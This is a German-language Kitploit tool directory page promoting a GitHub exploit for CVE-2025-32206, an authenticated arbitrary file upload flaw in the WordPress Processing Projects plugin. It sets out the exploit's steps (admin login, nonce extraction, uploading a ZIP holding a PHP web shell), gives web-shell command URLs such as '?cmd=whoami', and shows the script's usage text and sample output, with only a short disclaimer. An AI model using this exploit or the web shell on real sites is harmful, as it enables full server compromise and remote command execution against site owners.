Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-32206 — WordPress Processing Projects Plugin <= 1.0.2 ist anfällig für beliebigen Datei-Upload | Kitploit
Tools/GitHubGitHub/nxploited/cve-2025-32206
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstests
GitHubnxploited/cve-2025-32206

CVE-2025-32206

WordPress Processing Projects Plugin <= 1.0.2 ist anfällig für beliebigen Datei-Upload

Repository anzeigen
21vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-32206 - WordPress Processing Projects <= 1.0.2 Exploit für beliebigen Datei-Upload

CVE-2025-32206 Banner


🔍 CVE-Informationen

  • CVE-ID: CVE-2025-32206
  • Schwachstellentyp: Uneingeschränkter Datei-Upload (Web-Shell-Upload)
  • Betroffenes Plugin: Processing Projects WordPress Plugin
  • Betroffene Versionen: Von unbekannt (n/a) bis 1.0.2
  • CVSS-Score: 9.1 (KRITISCH)
  • Vektor: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

„Die Schwachstelle „Uneingeschränkter Upload einer Datei mit gefährlichem Typ“ in LABCAT Processing Projects ermöglicht es Angreifern, eine Web-Shell auf einen Webserver hochzuladen. Dies kann zu einer vollständigen Kompromittierung führen."


🧑‍💻 Exploit-Beschreibung

Dieses Python-Exploit-Skript zielt auf WordPress-Seiten ab, die das anfällige Processing Projects-Plugin (Version <= 1.0.2) verwenden. Das Plugin verarbeitet Datei-Uploads von authentifizierten Benutzern nicht ordnungsgemäß und ermöglicht das Hochladen beliebiger ZIP-Dateien, die ausführbaren PHP-Code (Web-Shells) enthalten.

Das Exploit-Skript:

  1. Authentifiziert sich als Administrator auf der Ziel-WordPress-Seite.
  2. Navigiert zum anfälligen Endpunkt und extrahiert automatisch Nonce-Felder.
  3. Erstellt eine ZIP-Datei (Nxploited.zip), die eine bösartige PHP-Shell (Nxploit.php) enthält.
  4. Lädt die Datei über eine POST-Anfrage hoch, die das WordPress-Admin-Verhalten nachahmt.
  5. Prüft, ob die Shell unter folgender Adresse erreichbar ist:
    • http://target.com/wp-content/uploads/processing-projects/Nxploit.php

🐚 Shell-Nutzung

Sobald die Shell erfolgreich hochgeladen wurde, kann sie verwendet werden, um Systembefehle über den Parameter cmd auszuführen. Beispiele:

root@kitploit:~
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls

Diese Shell führt beliebige Betriebssystembefehle aus und gibt deren Ausgabe direkt in der Antwort zurück.


🚀 Verwendung

root@kitploit:~
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-32206 | Von Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Ziel-WordPress-URL (z. B. http://target.com/wordpress)
  -un, --username USERNAME     WordPress-Admin-Benutzername
  -p, --password PASSWORD      WordPress-Admin-Passwort

📄 Beispielausgabe

root@kitploit:~

[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi

[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php

⚠️ Haftungsausschluss

Dieses Skript wird ausschließlich zu Bildungszwecken bereitgestellt. Die unbefugte Nutzung dieses Exploits auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch.

Halten Sie sich stets an verantwortungsvolle Offenlegungspraktiken und verwenden Sie dieses Tool nur in kontrollierten Umgebungen oder mit ausdrücklicher Genehmigung.


Von: Nxploited | Khaled Alenazi

Tool herunterladen